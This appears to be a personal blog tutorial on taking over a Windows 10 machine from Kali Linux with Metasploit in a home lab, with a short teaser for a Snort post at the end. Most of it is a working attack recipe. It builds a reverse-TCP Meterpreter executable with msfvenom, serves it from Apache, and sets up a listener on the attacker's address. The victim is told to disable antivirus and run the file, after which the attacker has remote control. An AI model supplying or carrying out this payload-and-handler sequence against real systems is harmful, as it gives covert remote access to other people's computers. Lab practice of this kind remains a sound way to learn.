Exploiting Windows using Metasploit in Kali-Linux

-
Hello everyone, I'm Jayneel chokshi

This blog is related to exploiting windows system(win-10) using Kali Linux.
So, basically we need two operating systems,

     1; Kali-Linux(attacker) 
     2: Windows(victim).

This Practical works when both of the machines are in same network.

So, I installed Kali-linux and windows 10 in Virtualbox.
And I've been able to put both devices in the same network, and you should do the same if you try to do the same. Other than that the important thing is that both machines must be in the same network,
This also applies if you have a host machine kali and on the other hand you have windows-10 (PC) with you.

You can install the Virtualbox and place it on the NAT network (Bridge Recommended).

Practical Starts Here - 

1. go to kali terminal and type the following command.
     To know your ip 192.168.1.3
        ifconfig


   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8080 -f       exe > /var/www/html/jayneel.exe



2. Now the jayneel.exe file was generated in file system/var/www.
3. Now again type the following commands to the terminal

  service apache2 status

Note :- " If service was not started then write "service apache2 start" to start apache server "



    msfdb init



4. Type following Commands in terminal.(don't close the terminal window after executing last command)
 type your kali ip instead of 192.168.1.3

   msfconsole




   use exploit/multi/handler
   set payload windows/x64/meterpreter/reverse_tcp
   set lport 8080
   set lhost 192.168.1.3
   exploit




5.The victim device should be on same network To download your .exe.
   Write the following url which is 192.168.1.3/jayneel.exe. 
  (Before executing that file make sure that that your antivirus program is turned off)
  after turning off antivirus execute jayneel.exe



6. after execution of that file, you will see that the kali got the session,
You will see the following message.



7. Now you can control the windows system from meterpreter.
     I am writing command sysinfo, this command show me the system info of that system,



Thankyou

Comments

Post a Comment

Popular posts from this blog

Installing And Configuring SNORT on Network Using Kali Linux

-
Image
Hello everyone, I'm Jayneel Chokshi This blog is related to  Configuring SNORT on Network Using Kali Linux What is SNORT ? --> Snort is the foremost Open Source Intrusion Prevention System (IPS) in the world. Snort IPS uses a series of rules that help define malicious network activity and uses those rules to find packets that match against them and generates alerts for users.   How it is shown in this blog ? --> Here we will configure SNORT our local Home network.           Here in this blog I will show you how you can get alerts in kali terminal if some user on your local home network(Wifi) is using Instagram, Facebook and Youtube. We will configure some set of custom rules for this three websites. SNORT itself comes with some sort of Pre-defined rules for Securing our network from Scanning and exploiting.   Requirements :- 1. Kali Linux (On bridge network) 2.Router    I have Installed Kali Linux on Virtual box. So lets Start --...
Read more